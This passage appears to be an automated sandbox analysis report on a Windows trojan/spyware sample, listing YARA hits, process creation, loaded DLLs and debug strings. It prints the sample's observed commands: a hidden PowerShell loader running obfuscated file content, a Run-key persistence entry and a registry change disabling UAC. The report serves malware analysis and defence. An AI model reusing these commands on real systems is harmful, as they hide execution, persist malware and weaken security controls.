          Source: Yara match | File source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR

          System Summary

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Partivarerne.scr
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_00406344
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_0040488F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_02C9EFF8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_02C9F8C8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_02C9ECB0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0720BC18
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll 5C66ABD3F06EAA357ED9663224C927CF7120DCA010572103FAA88832BB31C5AB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448
          Source: anziOUzZJs.exe | Static PE information: invalid certificate
          Source: anziOUzZJs.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@17/34@6/3
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_0040431C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | File created: C:\Users\user\Desktop\Flyverdragter.lnk
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7800
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | File created: C:\Users\user~1\AppData\Local\Temp\nsd1C81.tmp
          Source: anziOUzZJs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: anziOUzZJs.exe | ReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | File read: C:\Users\user\Desktop\anziOUzZJs.exe
          Source: unknown | Process created: C:\Users\user\Desktop\anziOUzZJs.exe "C:\Users\user\Desktop\anziOUzZJs.exe"
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 2384
          Source: C:\Users\user\Desktop\anziOUzZJs.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exe  Section loaded: gpapi.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: wkscli.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: webio.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: winnsi.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: rmclient.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelclient.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: propsys.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: coremessaging.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelproxy.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: vssapi.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: vsstrace.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: samlib.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: es.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: schannel.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: msasn1.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: dpapi.dll
          Source: C:\Windows\System32\svchost.exe  Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\anziOUzZJs.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: Flyverdragter.lnk.0.dr  LNK file: ..\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\triorchism\hvidte.pal
          Source: Window Recorder  Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: anziOUzZJs.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Configuration.Install.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Data.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.pdbTzQs source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: tion.pdb source: powershell.exe, 0000000A.00000002.2009656049.000000000816C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.Security.pdbH source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.pdbc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Core.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb` source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Numerics.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.pdb4X(w source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Transactions.ni.pdbRSDSc source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.DirectoryServices.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.ServiceProcess.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: mscorlib.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: System.Configuration.Install.ni.pdb source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2DB2.tmp.dmp.35.dr, WER196F.tmp.dmp.33.dr
